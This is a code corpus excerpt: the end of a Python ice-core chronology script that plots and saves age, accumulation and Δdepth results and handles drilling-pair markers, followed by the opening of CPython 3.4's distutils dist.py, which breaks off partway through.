(yr)') mpl.ylabel('Accumulation (m/yr)') if show_initial: mpl.step(self.age, np.concatenate((self.a_init, np.array([self.a_init[-1]]))), color=color_init, where='post', label='Initial') mpl.step(self.age, np.concatenate((self.a_model, np.array([self.a_model[-1]]))), color=color_mod, where='post', label='Prior') mpl.step(self.age, np.concatenate((self.a, np.array([self.a[-1]]))), color=color_opt, where='post', label='Posterior +/-$\sigma$') mpl.fill_between(self.age[:-1], self.a-self.sigma_a, self.a+self.sigma_a, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,y1,y2)) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/accumulation.pdf') pp.savefig(mpl.figure(self.label+' accumulation')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' LID') mpl.title(self.label+' LID') mpl.xlabel('Optimized age (yr)') mpl.ylabel('LID') if show_initial: mpl.plot(self.age, self.LID_init, color=color_init, label='Initial') mpl.plot(self.age, self.LID_model, color=color_mod, label='Prior') mpl.plot(self.age, self.LID, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_between(self.age, self.LID-self.sigma_LID, self.LID+self.sigma_LID, color=color_ci) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,y1,y2)) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/LID.pdf') pp.savefig(mpl.figure(self.label+' LID')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice age') mpl.title(self.label+' ice age') mpl.xlabel('age (yr b1950)') mpl.ylabel('depth (m)') if show_initial: mpl.plot(self.age_init, self.depth, color=color_init, label='Initial') if (np.size(self.icemarkers_depth)>0): mpl.errorbar(self.icemarkers_age, self.icemarkers_depth, color=color_obs, xerr=self.icemarkers_sigma, linestyle='', marker='o', markersize=2, label="dated horizons") # mpl.ylim(mpl.ylim()[::-1]) for i in range(np.size(self.iceintervals_duration)): y1=self.iceintervals_depthtop[i] y2=self.iceintervals_depthbot[i] x1=self.fct_age(y1) #(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) x2=x1+self.iceintervals_duration[i] #(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) xseries=np.array([x1,x2,x2,x1,x1]) yseries=np.array([y1,y1,y2,y2,y1]) if i==0: mpl.plot(xseries, yseries, color=color_di, label="dated intervals") mpl.errorbar(x2, y2, color=color_di, xerr=self.iceintervals_sigma[i], capsize=1) else: mpl.plot(xseries, yseries, color=color_di) mpl.errorbar(x2, y2, color=color_di, xerr=self.iceintervals_sigma[i], capsize=1) # mpl.arrow(x1, y1, x2-x1, y2-y1, fc=color_di, ec=color_di, head_width=0.02, head_length=0.05) # if (np.size(self.iceintervals_depthtop)>0): # mpl.errorbar(self.fct_age(self.iceintervals_depthtop)+self.iceintervals_duration, self.iceintervals_depthbot, color=color_di, xerr=self.iceintervals_sigma, linestyle='', marker='o', markersize='2', label="dated intervals") mpl.plot(self.age_model, self.depth, color=color_mod, label='Prior') mpl.plot(self.age, self.depth, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth, self.age-self.sigma_age, self.age+self.sigma_age , color=color_ci) # mpl.plot(self.age-self.sigma_age, self.depth, color='k', linestyle='-') mpl.plot(self.sigma_age*scale_ageci, self.depth, color=color_sigma, label='$\sigma$ x'+str(scale_ageci)) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice_age.pdf') pp.savefig(mpl.figure(self.label+' ice age')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air age') mpl.title(self.label+' air age') mpl.xlabel('age (yr b1950)') mpl.ylabel('depth (m)') if show_initial: mpl.plot(self.airage_init, self.depth, color=color_init, label='Initial') if (np.size(self.airmarkers_depth)>0): mpl.errorbar(self.airmarkers_age, self.airmarkers_depth, color=color_obs, xerr=self.airmarkers_sigma, linestyle='', marker='o', markersize=2, label="observations") # mpl.ylim(mpl.ylim()[::-1]) for i in range(np.size(self.airintervals_duration)): y1=self.airintervals_depthtop[i] y2=self.airintervals_depthbot[i] x1=self.fct_airage(y1) #(y2-y1)/(self.iceintervals_duration[i]+self.iceintervals_sigma[i]) x2=x1+self.airintervals_duration[i] #(y2-y1)/(self.iceintervals_duration[i]-self.iceintervals_sigma[i]) xseries=np.array([x1,x2,x2,x1,x1]) yseries=np.array([y1,y1,y2,y2,y1]) if i==0: mpl.plot(xseries, yseries, color=color_di, label="dated intervals") mpl.errorbar(x2, y2, color=color_di, xerr=self.airintervals_sigma[i], capsize=1) else: mpl.plot(xseries, yseries, color=color_di) mpl.errorbar(x2, y2, color=color_di, xerr=self.airintervals_sigma[i], capsize=1) mpl.plot(self.airage_model, self.depth, color=color_mod, label='Prior') mpl.fill_betweenx(self.depth, self.airage-self.sigma_airage, self.airage+self.sigma_airage , color=color_ci) mpl.plot(self.airage, self.depth, color=color_opt, label='Posterior +/-$\sigma$') # mpl.plot(self.airage+self.sigma_airage, self.depth, color='k', linestyle='-', label='+/- 1 sigma') # mpl.plot(self.airage-self.sigma_airage, self.depth, color='k', linestyle='-') mpl.plot(self.sigma_airage*scale_ageci, self.depth, color=color_sigma, label='$\sigma$ x'+str(scale_ageci)) x1,x2,y1,y2 = mpl.axis() mpl.axis((self.age_top,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air_age.pdf') pp.savefig(mpl.figure(self.label+' air age')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' Ddepth') mpl.title(self.label+' $\Delta$depth') mpl.xlabel('$\Delta$depth (m)') mpl.ylabel('Air depth (m)') if show_initial: mpl.plot(self.Ddepth_init, self.depth, color=color_init, label='Initial') if (np.size(self.Ddepth_depth)>0): mpl.errorbar(self.Ddepth_Ddepth, self.Ddepth_depth, color=color_obs, xerr=self.Ddepth_sigma, linestyle='', marker='o', markersize=2, label="observations") # mpl.ylim(mpl.ylim()[::-1]) mpl.plot(self.Ddepth_model, self.depth, color=color_mod, label='Prior') mpl.plot(self.Ddepth, self.depth, color=color_opt, label='Posterior +/-$\sigma$') mpl.fill_betweenx(self.depth, self.Ddepth-self.sigma_Ddepth, self.Ddepth+self.sigma_Ddepth, color=color_ci) # mpl.plot(self.Ddepth+self.sigma_Ddepth, self.depth, color='k', linestyle='-', label='+/- 1 sigma') # mpl.plot(self.Ddepth-self.sigma_Ddepth, self.depth, color='k', linestyle='-') x1,x2,y1,y2 = mpl.axis() mpl.axis((x1,x2,self.depth[-1],self.depth[0])) mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/Ddepth.pdf') pp.savefig(mpl.figure(self.label+' Ddepth')) pp.close() if not show_figures: mpl.close() def save(self): output=np.vstack((self.depth,self.age,self.sigma_age,self.airage,self.sigma_airage,np.append(self.a,self.a[-1]),np.append(self.sigma_a,self.sigma_a[-1]),np.append(self.tau,self.tau[-1]),np.append(self.sigma_tau,self.sigma_tau[-1]),self.LID,self.sigma_LID, self.Ddepth,self.sigma_Ddepth,np.append(self.a_model,self.a_model[-1]),np.append(self.sigma_a_model,self.sigma_a_model[-1]),np.append(self.tau_model,self.tau_model[-1]),np.append(self.sigma_tau_model,self.sigma_tau_model[-1]),self.LID_model,self.sigma_LID_model,np.append(self.icelayerthick,self.icelayerthick[-1]),np.append(self.sigma_icelayerthick,self.sigma_icelayerthick[-1]),np.append(self.airlayerthick,self.airlayerthick[-1]),np.append(self.sigma_airlayerthick,self.sigma_airlayerthick[-1]))) with open(datadir+self.label+'/output.txt','w') as f: f.write('#depth\tage\tsigma_age\tair_age\tsigma_air_age\taccu\tsigma_accu\tthinning\tsigma_thinning\tLID\tsigma_LID\tDdepth\tsigma_Ddepth\taccu_model\tsigma_accu_model\tthinning_model\tsigma_thinning_model\tLID_model\tsigma_LID_model\ticelayerthick\tsigma_icelayerthick\tairlayerthick\tsigma_airlayerthick\n') np.savetxt(f,np.transpose(output), delimiter='\t') np.savetxt(datadir+self.label+'/restart.txt',np.transpose(self.variables)) # def udepth_save(self): # np.savetxt(datadir+self.label+'/udepth.txt',self.udepth) class DrillingPair: def __init__(self, D1, D2): self.D1=D1 self.D2=D2 def init(self): self.label=self.D1.label+'-'+self.D2.label # print 'Initialization of drilling pair ',self.label #TODO: allow to have either dlabel1+'-'dlabel2 or dlbel2+'-'dlabel1 as directory filename=datadir+self.D1.label+'-'+self.D2.label+'/ice_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.iceicemarkers_depth1=readarray[:,0] self.iceicemarkers_depth2=readarray[:,1] self.iceicemarkers_sigma=readarray[:,2] else: self.iceicemarkers_depth1=np.array([]) self.iceicemarkers_depth2=np.array([]) self.iceicemarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/air_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.airairmarkers_depth1=readarray[:,0] self.airairmarkers_depth2=readarray[:,1] self.airairmarkers_sigma=readarray[:,2] else: self.airairmarkers_depth1=np.array([]) self.airairmarkers_depth2=np.array([]) self.airairmarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/iceair_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.iceairmarkers_depth1=readarray[:,0] self.iceairmarkers_depth2=readarray[:,1] self.iceairmarkers_sigma=readarray[:,2] else: self.iceairmarkers_depth1=np.array([]) self.iceairmarkers_depth2=np.array([]) self.iceairmarkers_sigma=np.array([]) filename=datadir+self.D1.label+'-'+self.D2.label+'/airice_depth.txt' if os.path.isfile(filename) and open(filename).read(): readarray=np.loadtxt(filename) self.airicemarkers_depth1=readarray[:,0] self.airicemarkers_depth2=readarray[:,1] self.airicemarkers_sigma=readarray[:,2] else: self.airicemarkers_depth1=np.array([]) self.airicemarkers_depth2=np.array([]) self.airicemarkers_sigma=np.array([]) self.iceicemarkers_correlation=np.diag(np.ones(np.size(self.iceicemarkers_depth1))) self.airairmarkers_correlation=np.diag(np.ones(np.size(self.airairmarkers_depth1))) self.iceairmarkers_correlation=np.diag(np.ones(np.size(self.iceairmarkers_depth1))) self.airicemarkers_correlation=np.diag(np.ones(np.size(self.airicemarkers_depth1))) filename=datadir+'/parameters-CovarianceObservations-AllDrillingPairs.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovarianceObservations.py' if os.path.isfile(filename): execfile(filename) if np.size(self.iceicemarkers_depth1)>0: self.iceicemarkers_chol=cholesky(self.iceicemarkers_correlation) self.iceicemarkers_lu_piv=scipy.linalg.lu_factor(self.iceicemarkers_chol) if np.size(self.airairmarkers_depth1)>0: self.airairmarkers_chol=cholesky(self.airairmarkers_correlation) self.airairmarkers_lu_piv=scipy.linalg.lu_factor(self.airairmarkers_chol) if np.size(self.iceairmarkers_depth1)>0: self.iceairmarkers_chol=cholesky(self.iceairmarkers_correlation) self.iceairmarkers_lu_piv=scipy.linalg.lu_factor(self.iceairmarkers_chol) if np.size(self.airicemarkers_depth1)>0: self.airicemarkers_chol=cholesky(self.airicemarkers_correlation) self.airicemarkers_lu_piv=scipy.linalg.lu_factor(self.airicemarkers_chol) def residuals(self): resi_iceice=(self.D1.fct_age(self.iceicemarkers_depth1)-self.D2.fct_age(self.iceicemarkers_depth2))/self.iceicemarkers_sigma if np.size(self.iceicemarkers_depth1)>0: resi_iceice=scipy.linalg.lu_solve(self.iceicemarkers_lu_piv,resi_iceice) resi_airair=(self.D1.fct_airage(self.airairmarkers_depth1)-self.D2.fct_airage(self.airairmarkers_depth2))/self.airairmarkers_sigma if np.size(self.airairmarkers_depth1)>0: resi_airair=scipy.linalg.lu_solve(self.airairmarkers_lu_piv,resi_airair) resi_iceair=(self.D1.fct_age(self.iceairmarkers_depth1)-self.D2.fct_airage(self.iceairmarkers_depth2))/self.iceairmarkers_sigma if np.size(self.iceairmarkers_depth1)>0: resi_iceair=scipy.linalg.lu_solve(self.iceairmarkers_lu_piv,resi_iceair) resi_airice=(self.D1.fct_airage(self.airicemarkers_depth1)-self.D2.fct_age(self.airicemarkers_depth2))/self.airicemarkers_sigma if np.size(self.airicemarkers_depth1)>0: resi_airice=scipy.linalg.lu_solve(self.airicemarkers_lu_piv,resi_airice) resi=np.concatenate((resi_iceice,resi_airair,resi_iceair,resi_airice)) return resi def figures(self): if not os.path.isdir(datadir+self.label): os.mkdir(datadir+self.label) mpl.figure(self.label+' ice-ice') mpl.xlabel(self.D1.label+' ice age (yr b1950)') mpl.ylabel(self.D2.label+' ice age (yr b1950)') if (np.size(self.iceicemarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_age_init(self.iceicemarkers_depth1),self.D2.fct_age_init(self.iceicemarkers_depth2), color=color_init, xerr=self.iceicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_age_model(self.iceicemarkers_depth1),self.D2.fct_age_model(self.iceicemarkers_depth2), color=color_mod, xerr=self.iceicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_age(self.iceicemarkers_depth1),self.D2.fct_age(self.iceicemarkers_depth2), color=color_opt, xerr=self.iceicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice-ice.pdf') pp.savefig(mpl.figure(self.label+' ice-ice')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air-air') mpl.xlabel(self.D1.label+' air age (yr b1950)') mpl.ylabel(self.D2.label+' air age (yr b1950)') if (np.size(self.airairmarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_airage_init(self.airairmarkers_depth1),self.D2.fct_airage_init(self.airairmarkers_depth2), color=color_init, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_airage_model(self.airairmarkers_depth1),self.D2.fct_airage_model(self.airairmarkers_depth2), color=color_mod, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_airage(self.airairmarkers_depth1),self.D2.fct_airage(self.airairmarkers_depth2), color=color_opt, xerr=self.airairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air-air.pdf') pp.savefig(mpl.figure(self.label+' air-air')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' ice-air') mpl.xlabel(self.D1.label+' ice age (yr b1950)') mpl.ylabel(self.D2.label+' air age (yr b1950)') if (np.size(self.iceairmarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_age_init(self.iceairmarkers_depth1),self.D2.fct_airage_init(self.iceairmarkers_depth2), color=color_init, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_age_model(self.iceairmarkers_depth1),self.D2.fct_airage_model(self.iceairmarkers_depth2), color=color_mod, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_age(self.iceairmarkers_depth1),self.D2.fct_airage(self.iceairmarkers_depth2), color=color_opt, xerr=self.iceairmarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/ice-air.pdf') pp.savefig(mpl.figure(self.label+' ice-air')) pp.close() if not show_figures: mpl.close() mpl.figure(self.label+' air-ice') mpl.xlabel(self.D1.label+' air age (yr b1950)') mpl.ylabel(self.D2.label+' ice age (yr b1950)') if (np.size(self.airicemarkers_depth1)>0): if show_initial: mpl.errorbar(self.D1.fct_airage_init(self.airicemarkers_depth1),self.D2.fct_age_init(self.airicemarkers_depth2), color=color_init, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Initial") mpl.errorbar(self.D1.fct_airage_model(self.airicemarkers_depth1),self.D2.fct_age_model(self.airicemarkers_depth2), color=color_mod, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Prior") mpl.errorbar(self.D1.fct_airage(self.airicemarkers_depth1),self.D2.fct_age(self.airicemarkers_depth2), color=color_opt, xerr=self.airicemarkers_sigma, linestyle='', marker='o', markersize=2, label="Posterior") x1,x2,y1,y2 = mpl.axis() x1=self.D1.age_top y1=self.D2.age_top mpl.axis((x1,x2,y1,y2)) range=np.array([max(x1,y1),min(x2,y2)]) mpl.plot(range,range, color=color_obs, label='perfect agreement') mpl.legend(loc="best") pp=PdfPages(datadir+self.label+'/air-ice.pdf') pp.savefig(mpl.figure(self.label+' air-ice')) pp.close() if not show_figures: mpl.close()
mit
OptimusGitEtna/RestSymf
Python-3.4.2/Lib/distutils/dist.py
85
49786
"""distutils.dist Provides the Distribution class, which represents the module distribution being built/installed/distributed. """ import sys, os, re from email import message_from_file try: import warnings except ImportError: warnings = None from distutils.errors import * from distutils.fancy_getopt import FancyGetopt, translate_longopt from distutils.util import check_environ, strtobool, rfc822_escape from distutils import log from distutils.debug import DEBUG # Regex to define acceptable Distutils command names. This is not *quite* # the same as a Python NAME -- I don't allow leading underscores. The fact # that they're very similar is no coincidence; the default naming scheme is # to look for a Python module named after the command. command_re = re.compile (r'^[a-zA-Z]([a-zA-Z0-9_]*)$') class Distribution: """The core of the Distutils. Most of the work hiding behind 'setup' is really done within a Distribution instance, which farms the work out to the Distutils commands specified on the command line. Setup scripts will almost never instantiate Distribution directly, unless the 'setup()' function is totally inadequate to their needs. However, it is conceivable that a setup script might wish to subclass Distribution for some specialized purpose, and then pass the subclass to 'setup()' as the 'distclass' keyword argument. If so, it is necessary to respect the expectations that 'setup' has of Distribution. See the code for 'setup()', in core.py, for details. """ # 'global_options' describes the command-line options that may be # supplied to the setup script prior to any actual commands. # Eg. "./setup.py -n" or "./setup.py --quiet" both take advantage of # these global options. This list should be kept to a bare minimum, # since every global option is also valid as a command option -- and we # don't want to pollute the commands with too many options that they # have minimal control over. # The fourth entry for verbose means that it can be repeated. global_options = [('verbose', 'v', "run verbosely (default)", 1), ('quiet', 'q', "run quietly (turns verbosity off)"), ('dry-run', 'n', "don't actually do anything"), ('help', 'h', "show detailed help message"), ('no-user-cfg', None, 'ignore pydistutils.cfg in your home directory'), ] # 'common_usage' is a short (2-3 line) string describing the common # usage of the setup script. common_usage = """\ Common commands: (see '--help-commands' for more) setup.py build will build the package underneath 'build/' setup.py install will install the package """ # options that are not propagated to the commands display_options = [ ('help-commands', None, "list all available commands"), ('name', None, "print package name"), ('version', 'V', "print package version"), ('fullname', None, "print <package name>-<version>"), ('author', None, "print the author's name"), ('author-email', None, "print the author's email address"), ('maintainer', None, "print the maintainer's name"), ('maintainer-email', None, "print the maintainer's email address"), ('contact', None, "print the maintainer's name if known, else the author's"), ('contact-email', None, "print the maintainer's email address if known, else the author's"), ('url', None, "print the URL for this package"), ('license', None, "print the license of the package"), ('licence', None, "alias for --license"), ('description', None, "print the package description"), ('long-description', None, "print the long package description"), ('platforms', None, "print the list of platforms"), ('classifiers', None, "print the list of classifiers"), ('keywords', None, "print the list of keywords"), ('provides', None, "print the list of packages/modules provided"), ('requires', None, "print the list of packages/modules required"), ('obsoletes', None, "print the list of packages/modules made obsolete") ] display_option_names = [translate_longopt(x[0]) for x in display_options] # negative options are options that exclude other options negative_opt = {'quiet': 'verbose'} # -- Creation/initialization methods ------------------------------- def __init__ (self, attrs=None): """Construct a new Distribution instance: initialize all the attributes of a Distribution, and then use 'attrs' (a dictionary mapping attribute names to values) to assign some of those attributes their "real" values. (Any attributes not mentioned in 'attrs' will be assigned to some null value: 0, None, an empty list or dictionary, etc.) Most importantly, initialize the 'command_obj' attribute to the empty dictionary; this will be filled in with real command objects by 'parse_command_line()'. """ # Default values for our command-line options self.verbose = 1 self.dry_run = 0 self.help = 0 for attr in self.display_option_names: setattr(self, attr, 0) # Store the distribution meta-data (name, version, author, and so # forth) in a separate object -- we're getting to have enough # information here (and enough command-line options) that it's # worth it. Also delegate 'get_XXX()' methods to the 'metadata' # object in a sneaky and underhanded (but efficient!) way. self.metadata = DistributionMetadata() for basename in self.metadata._METHOD_BASENAMES: method_name = "get_" + basename setattr(self, method_name, getattr(self.metadata, method_name)) # 'cmdclass' maps command names to class objects, so we # can 1) quickly figure out which class to instantiate when # we need to create a new command object, and 2) have a way # for the setup script to override command classes self.cmdclass = {} # 'command_packages' is a list of packages in which commands # are searched for. The factory for command 'foo' is expected # to be named 'foo' in the module 'foo' in one of the packages # named here. This list is searched from the left; an error # is raised if no named package provides the command being # searched for. (Always access using get_command_packages().) self.command_packages = None # 'script_name' and 'script_args' are usually set to sys.argv[0] # and sys.argv[1:], but they can be overridden when the caller is # not necessarily a setup script run from the command-line. self.script_name = None self.script_args = None # 'command_options' is where we store command options between # parsing them (from config files, the command-line, etc.) and when # they are actually needed -- ie. when the command in question is # instantiated. It is a dictionary of dictionaries of 2-tuples: # command_options = { command_name : { option : (source, value) } } self.command_options = {} # 'dist_files' is the list of (command, pyversion, file) that # have been created by any dist commands run so far. This is # filled regardless of whether the run is dry or not. pyversion # gives sysconfig.get_python_version() if the dist file is # specific to a Python version, 'any' if it is good for all # Python versions on the target platform, and '' for a source # file. pyversion should not be used to specify minimum or # maximum required Python versions; use the metainfo for that # instead. self.dist_files = [] # These options are really the business of various commands, rather # than of the Distribution itself. We provide aliases for them in # Distribution as a convenience to the developer. self.packages = None self.package_data = {} self.package_dir = None self.py_modules = None self.libraries = None self.headers = None self.ext_modules = None self.ext_package = None self.include_dirs = None self.extra_path = None self.scripts = None self.data_files = None self.password = '' # And now initialize bookkeeping stuff that can't be supplied by # the caller at all. 'command_obj' maps command names to # Command instances -- that's how we enforce that every command # class is a singleton. self.command_obj = {} # 'have_run' maps command names to boolean values; it keeps track # of whether we have actually run a particular command, to make it # cheap to "run" a command whenever we think we might need to -- if # it's already been done, no need for expensive filesystem # operations, we just check the 'have_run' dictionary and carry on. # It's only safe to query 'have_run' for a command class that has # been instantiated -- a false value will be inserted when the # command object is created, and replaced with a true value when # the command is successfully run. Thus it's probably best to use # '.get()' rather than a straight lookup. self.have_run = {} # Now we'll use the attrs dictionary (ultimately, keyword args from # the setup script) to possibly override any or all of these # distribution options. if attrs: # Pull out the set of command options and work on them # specifically. Note that this order guarantees that aliased # command options will override any supplied redundantly # through the general options dictionary. options = attrs.get('options') if options is not None: del attrs['options'] for (command, cmd_options) in options.items(): opt_dict = self.get_option_dict(command) for (opt, val) in cmd_options.items(): opt_dict[opt] = ("setup script", val) if 'licence' in attrs: attrs['license'] = attrs['licence'] del attrs['licence'] msg = "'licence' distribution option is deprecated; use 'license'" if warnings is not None: warnings.warn(msg) else: sys.stderr.write(msg + "\n") # Now work on the rest of the attributes. Any attribute that's # not already defined is invalid! for (key, val) in attrs.items(): if hasattr(self.metadata, "set_" + key): getattr(self.metadata, "set_" + key)(val) elif hasattr(self.metadata, key): setattr(self.metadata, key, val) elif hasattr(self, key): setattr(self, key, val) else: msg = "Unknown distribution option: %s" % repr(key) if warnings is not None: warnings.warn(msg) else: sys.stderr.write(msg + "\n") # no-user-cfg is handled before other command line args # because other args override the config files, and this # one is needed before we can load the config files. # If attrs['script_args'] wasn't passed, assume false. # # This also make sure we just look at the global options self.want_user_cfg = True if self.script_args is not None: for arg in self.script_args: if not arg.startswith('-'): break if arg == '--no-user-cfg': self.want_user_cfg = False break self.finalize_options() def get_option_dict(self, command): """Get the option dictionary for a given command. If that command's option dictionary hasn't been created yet, then create it and return the new dictionary; otherwise, return the existing option dictionary. """ dict = self.command_options.get(command) if dict is None: dict = self.command_options[command] = {} return dict def dump_option_dicts(self, header=None, commands=None, indent=""): from pprint import pformat if commands is None: # dump all command option dicts commands = sorted(self.command_options.keys()) if header is not None: self.announce(indent + header) indent = indent + " " if not commands: self.announce(indent + "no commands known yet") return for cmd_name in commands: opt_dict = self.command_options.get(cmd_name) if opt_dict is None: self.announce(indent + "no option dict for '%s' command" % cmd_name) else: self.announce(indent + "option dict for '%s' command:" % cmd_name) out = pformat(opt_dict) for line in out.split('\n'): self.announce(indent + " " + line) # -- Config file finding/parsing methods --------------------------- def find_config_files(self): """Find as many configuration files as should be processed for this platform, and return a list of filenames in the order in which they should be parsed. The filenames returned are guaranteed to exist (modulo nasty race conditions). There are three possible config files: distutils.cfg in the Distutils installation directory (ie. where the top-level Distutils __inst__.py file lives), a file in the user's home directory named .pydistutils.cfg on Unix and pydistutils.cfg on Windows/Mac; and setup.cfg in the current directory. The file in the user's home directory can be disabled with the --no-user-cfg option. """ files = [] check_environ() # Where to look for the system-wide Distutils config file sys_dir = os.path.dirname(sys.modules['distutils'].__file__) # Look for the system config file sys_file = os.path.join(sys_dir, "distutils.cfg") if os.path.isfile(sys_file): files.append(sys_file) # What to call the per-user config file if os.name == 'posix': user_filename = ".pydistutils.cfg" else: user_filename = "pydistutils.cfg" # And look for the user config file if self.want_user_cfg: user_file = os.path.join(os.path.expanduser('~'), user_filename) if os.path.isfile(user_file): files.append(user_file) # All platforms support local setup.cfg local_file = "setup.cfg" if os.path.isfile(local_file): files.append(local_file) if DEBUG: self.announce("using config files: %s" % ', '.join(files)) return files def parse_config_files(self, filenames=None): from configparser import ConfigParser # Ignore install directory options if we have a venv if sys.prefix != sys.base_prefix: ignore_options = [ 'install-base', 'install-platbase', 'install-lib', 'install-platlib', 'install-purelib', 'install-headers', 'install-scripts', 'install-data', 'prefix', 'exec-prefix', 'home', 'user', 'root'] else: ignore_options = [] ignore_options = frozenset(ignore_options) if filenames is None: filenames = self.find_config_files() if DEBUG: self.announce("Distribution.parse_config_files():") parser = ConfigParser() for filename in filenames: if DEBUG: self.announce(" reading %s" % filename) parser.read(filename) for section in parser.sections(): options = parser.options(section) opt_dict = self.get_option_dict(section) for opt in options: if opt != '__name__' and opt not in ignore_options: val = parser.get(section,opt) opt = opt.replace('-', '_') opt_dict[opt] = (filename, val) # Make the ConfigParser forget everything (so we retain # the original filenames that options come from) parser.__init__() # If there was a "global" section in the config file, use it # to set Distribution options. if 'global' in self.command_options: for (opt, (src, val)) in self.command_options['global'].items(): alias = self.negative_opt.get(opt) try: if alias: setattr(self, alias, not strtobool(val)) elif opt in ('verbose', 'dry_run'): # ugh! setattr(self, opt, strtobool(val)) else: setattr(self, opt, val) except ValueError as msg: raise DistutilsOptionError(msg) # -- Command-line parsing methods ---------------------------------- def parse_command_line(self): """Parse the setup script's command line, taken from the 'script_args' instance attribute (which defaults to 'sys.argv[1:]' -- see 'setup()' in core.py). This list is first processed for "global options" -- options that set attributes of the Distribution instance. Then, it is alternately scanned for Distutils commands and options for that command. Each new command terminates the options for the previous command. The allowed options for a command are determined by the 'user_options' attribute of the command class -- thus, we have to be able to load command classes in order to parse the command line. Any error in that 'options' attribute raises DistutilsGetoptError; any error on the command-line raises DistutilsArgError. If no Distutils commands were found on the command line, raises DistutilsArgError. Return true if command-line was successfully parsed and we should carry on with executing commands; false if no errors but we shouldn't execute commands (currently, this only happens if user asks for help). """ # # We now have enough information to show the Macintosh dialog # that allows the user to interactively specify the "command line". # toplevel_options = self._get_toplevel_options() # We have to parse the command line a bit at a time -- global # options, then the first command, then its options, and so on -- # because each command will be handled by a different class, and # the options that are valid for a particular class aren't known # until we have loaded the command class, which doesn't happen # until we know what the command is. self.commands = [] parser = FancyGetopt(toplevel_options + self.display_options) parser.set_negative_aliases(self.negative_opt) parser.set_aliases({'licence': 'license'}) args = parser.getopt(args=self.script_args, object=self) option_order = parser.get_option_order() log.set_verbosity(self.verbose) # for display options we return immediately if self.handle_display_options(option_order): return while args: args = self._parse_command_opts(parser, args) if args is None: # user asked for help (and got it) return # Handle the cases of --help as a "global" option, ie. # "setup.py --help" and "setup.py --help command ...". For the # former, we show global options (--verbose, --dry-run, etc.) # and display-only options (--name, --version, etc.); for the # latter, we omit the display-only options and show help for # each command listed on the command line. if self.help: self._show_help(parser, display_options=len(self.commands) == 0, commands=self.commands) return # Oops, no commands found -- an end-user error if not self.commands: raise DistutilsArgError("no commands supplied") # All is well: return true return True def _get_toplevel_options(self): """Return the non-display options recognized at the top level. This includes options that are recognized *only* at the top level as well as options recognized for commands. """ return self.global_options + [ ("command-packages=", None, "list of packages that provide distutils commands"), ] def _parse_command_opts(self, parser, args): """Parse the command-line options for a single command. 'parser' must be a FancyGetopt instance; 'args' must be the list of arguments, starting with the current command (whose options we are about to parse). Returns a new version of 'args' with the next command at the front of the list; will be the empty list if there are no more commands on the command line. Returns None if the user asked for help on this command. """ # late import because of mutual dependence between these modules from distutils.cmd import Command # Pull the current command from the head of the command line command = args[0] if not command_re.match(command): raise SystemExit("invalid command name '%s'" % command) self.commands.append(command) # Dig up the command class that implements this command, so we # 1) know that it's a valid command, and 2) know which options # it takes. try: cmd_class = self.get_command_class(command) except DistutilsModuleError as msg: raise DistutilsArgError(msg) # Require that the command class be derived from Command -- want # to be sure that the basic "command" interface is implemented. if not issubclass(cmd_class, Command): raise DistutilsClassError( "command class %s must subclass 